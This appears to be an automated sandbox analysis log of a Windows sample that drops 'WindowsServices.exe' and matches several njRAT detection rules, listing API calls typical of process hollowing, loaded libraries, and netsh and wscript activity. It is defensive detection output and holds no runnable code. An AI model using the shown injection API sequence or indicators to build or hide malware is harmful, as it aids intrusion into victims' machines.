        Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 0_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,0_2_00405A10
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 3_2_00AAAA46 NtQuerySystemInformation,3_2_00AAAA46
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 3_2_00AAAA15 NtQuerySystemInformation,3_2_00AAAA15
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 12_2_00CBAA46 NtQuerySystemInformation,12_2_00CBAA46
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 12_2_00CBAA15 NtQuerySystemInformation,12_2_00CBAA15
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 21_2_00C2AA46 NtQuerySystemInformation,21_2_00C2AA46
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 21_2_00C2AA15 NtQuerySystemInformation,21_2_00C2AA15
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 0_2_00405A100_2_00405A10
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 3_2_00E60CD83_2_00E60CD8
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 3_2_00E60CBE3_2_00E60CBE
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: String function: 00404850 appears 69 times
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: String function: 00404670 appears 69 times
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: String function: 00403E10 appears 116 times
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: String function: 004039C0 appears 116 times
        Source: nOZ2Oqnzbz.exe, 00000000.00000002.1624361982.0000000002160000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFlowerPower.EXE vs nOZ2Oqnzbz.exe
        Source: nOZ2Oqnzbz.exe, 00000000.00000002.1624289078.000000000066B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecaspol.exeT vs nOZ2Oqnzbz.exe
        Source: nOZ2Oqnzbz.exe, 00000000.00000000.1613067115.0000000000441000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFlowerPower.EXE vs nOZ2Oqnzbz.exe
        Source: nOZ2Oqnzbz.exe, 00000003.00000002.1700190097.0000000003C16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFlowerPower.EXE vs nOZ2Oqnzbz.exe
        Source: nOZ2Oqnzbz.exe, 00000003.00000000.1622574378.0000000000441000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFlowerPower.EXE vs nOZ2Oqnzbz.exe
        Source: nOZ2Oqnzbz.exeBinary or memory string: OriginalFilenameFlowerPower.EXE vs nOZ2Oqnzbz.exe
        Source: nOZ2Oqnzbz.exe.0.drBinary or memory string: OriginalFilenamecaspol.exeT vs nOZ2Oqnzbz.exe
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: mfc42.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mfc42.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: avicap32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mfc42.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mscoree.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mfc42.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mscoree.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptbase.dll
        Source: nOZ2Oqnzbz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
